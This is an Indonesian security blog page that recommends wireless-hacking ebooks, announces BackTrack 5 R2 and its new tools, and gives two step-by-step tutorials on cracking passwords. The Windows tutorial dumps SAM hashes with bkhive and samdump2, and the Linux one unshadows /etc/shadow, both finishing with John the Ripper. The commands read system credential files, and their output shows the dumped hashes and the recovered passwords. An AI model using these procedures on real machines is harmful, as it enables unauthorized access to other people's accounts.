Ebook BackTrack 5 Wireless Penetration Testing Beginners Guide


Jika sebelumnya sahabat sudah membaca Ebook Wireless KungFu Networking & Hacking yang bisa membantu sahabat untuk memiliki dasar yang kuat tentang kemanan Wireless, sekarang sahabat wajib membaca Ebook BackTrack 5 Wireless Penetration Testing Beginners Guide ini, yang lebih menekankan pada prakteknya, sehingga sahabat tidak hanya mengguasai teori saja tetapi juga menguasai Prakteknya, karena itulah yang sedang dicari baik saya maupun sahabat.

Ebook Wireless KungFu Networking & Hacking


Buat sahabat yang ingin belajar hacking wireless dari awal, mungkin ebook Wireless KungFu Networking & Hacking yang ditulis oleh s'to dari founder jasakom ini bisa membantu sahabat. Buku yang sudah bisa sahabat beli ditoko-toko buku terdekat ini berisi dasar-dasar teori tentang keamanan wireless yang sahabat perlu ketahui untuk bisa lebih menguasai Wireless Hacking.

Saya rekomendasikan sahabat membaca ebook ini yang kemudian dilanjutkan membaca ebook BackTrack 5 Wireless Penetration Testing Beginners Guide yang menekankan pada prakteknya Hacking Wireless.

Monday, March 5, 2012

BackTrack 5 R2 Dirilis

Setelah ditunggu-tunggu akhirnya dirilis juga BackTrack 5 R2 pada tanggal 1 maret 2012. Pada versi ini sahabat akan mendapatkan banyak perubahan mulai dari aplikasi-aplikasi yang baru, perbaikan-perbaikan pada versi sebelumnya bahkan penggunaan kernel 3.2.6 yang lebih support terhadap wireless card. Jadi kalau sebelumnya komputer sahabat bermasalah dengan wireless card mungkin dengan menggunakan versi ini sahabat bisa lebih memaksimalkan komputer sahabat.

Berikut adalah aplikasi-aplikasi yang baru ditambahakan :

arduino
bluelog    
bt-audit    
dirb    
dnschef    
dpscan    
easy-creds    
extundelete
findmyhash    
golismero    
goofile    
hashcat-gui    
hash-identifier    
hexorbase    
horst    
hotpatch
joomscan    
killerbee    
libhijack    
magictree    
nipper-ng    
patator    
pipal    
pyrit
reaver    
rebind    
rec-studio    
redfang    
se-toolkit    
sqlsus    
sslyze    
sucrack
thc-ssl-dos    
tlssled    
uniscan    
vega    
watobo    
wce    
wol-e    
xspy

selain tambahan aplikasi diatas versi ini juga melakukan upgrade pada beberapa aplikasi yang baru dengan rilis yang paling baru.

Dan buat sahabat yang ingin mendapatkan aplikasi-aplikasi terbaru tapi tingak ingin melakukan installasi ulang bisa menggunakan perintah dibawah ini.

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

Untuk Download Backtrack 5 R2 disini :

Mirror by idrepo :

1. BT5R2-GNOME-32.iso 
2. BT5R2-GNOME-64.iso
3. BT5R2-GNOME-VM-32.7z
4. BT5R2-GNOME-VM-64.7z
5. BT5R2-KDE-32.iso
6. BT5R2-KDE-64.iso

Atau melalui repository lokal :

Alternative download link :

1. by AntiHackerlink : BackTrack 5 R 2 
2. by ftp.halifax.rwth-aachen.de :BackTrack 5 R 2
Source : BackTrack-Linux , IndoBackTrack

Saturday, March 3, 2012

Cracking Password Windows

Sistem operasi windows menyimpan file passwordnya pada /WINDOWS/system32/config/SAM yang enkripsi sehingga cracker tidak bisa membaca isi filenya, akan tetapi faktanya adalah sia-sia karena proteksi ini berhasil ditembus. Sehingga Microsoft menambahkan satu tahap proteksi untuk melakukan pengacakan pada file SAM semenjak sistem operasi NT SP 3 yang dinamakan syskey (SYStem KEY) yang baru dipakai pada Windows XP dan 2003.
Sehingga kegiatan Cracking Menjadi sulit karena harus mendapatkan nilai syskey sebelumnya untuk melakukan cracking pada password Windows. Disini kita kan manggunakan bkhive untuk untuk mendapatkan syskey dan Samdump untuk mendapatkan hash dari file SAM. Terakhir file hash kita akan crack menggunakan John The Ripper.

1. Booting DVD Backtrack dan mount drive C pada windows

root@root:~# fdisk -l

Disk /dev/sda: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xf9c9f9c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1        1304    10474348+   7  HPFS/NTFS
root@root:~# mkdir /mnt/sda1
root@root:~# mount -t ntfs /dev/sda1 /mnt/sda1 -o force

2. Ambil key dari system menggunakan bkhive simpan menjadi key.txt

root@root:~# cd /mnt/sda1/WINDOWS/system32/config/
root@root:/mnt/sda1/WINDOWS/system32/config# bkhive system ~/Desktop/key.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: e5ff38114c42c939dd424d743c2449de



3. Gunakan samdump2 untuk mendapatkan hash dari file SAM dan key.txt simpan menjadi hash.txt

root@root:/mnt/sda1/WINDOWS/system32/config# samdump2 SAM ~/Desktop/key.txt > ~/Desktop/hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@root:/mnt/sda1/WINDOWS/system32/config# cat ~/Desktop/hash.txt 
Administrator:500:ad14d8a198d59425aad3b435b51404ee:3b8c3f78f6234c65f1546c64d2f60c02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c777e627a172ac2746aa5c01317bb49b:c89f1c86ea7236bf367851f3c58797be:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c5b7293e8c3265d42977595b48810830:::
octopurba:1003:a17aad0ec01bbbe934a157cfdb7ad51f:b5034028f7b2ae3cf9e93b1181a39f2e:::



4. Crack file dari hash.txt menggunakan John The Ripper

root@root:/mnt/sda1/WINDOWS/system32/config# cd /pentest/passwords/john/
root@root:/pentest/passwords/john# ./john ~/Desktop/hash.txt 
Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
GILAKOM          (octopurba:1)
                          (SUPPORT_388945a0)
                          (Guest)
PUTER              (octopurba:2)



diatas kita bisa melihat bahwa password adalah "gilakomputer" untuk user "octopurba".

Cracking Password Linux

Kebetulan kemarin pada workshop dikampus saya membahas tentang cracking password baik windows dan Linux disini saya akan membagikan cara cracking password untuk sistem operasi Linux dengan cara menggabungkan file /etc/passwd dan /etc/shadow menggunakan unshadow dari John The Ripper, langsung saja kita crack password linux kita.

1. Gabungkan /etc/passwd dan /etf/shadow simpan pada fileunshadow.txt

root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john# ./unshadow /etc/passwd /etc/shadow > /root/Desktop/fileunshadow.txt

2. Crack password dari file unshadow yang kita dapat

root@bt:/pentest/passwords/john# ./john /root/Desktop/fileunshadow.txt 
Loaded 1 password hash (generic crypt(3) [?/32])
gilakomputer.net (root)
guesses: 1  time: 0:00:00:23 DONE (Sun Mar  4 09:48:57 2012)  c/s: 39.50  trying: 123456 - pamela
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john -show /root/Desktop/fileunshadow.txt 
root:gilakomputer.net:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left 


Kita berhasil melakukan cracking pada user "root" dan password "gilakomputer.net".
Daftar password untuk John The Ripper dibacktrack tersimpan /pentest/passwords/john/password.lst.

 
biz.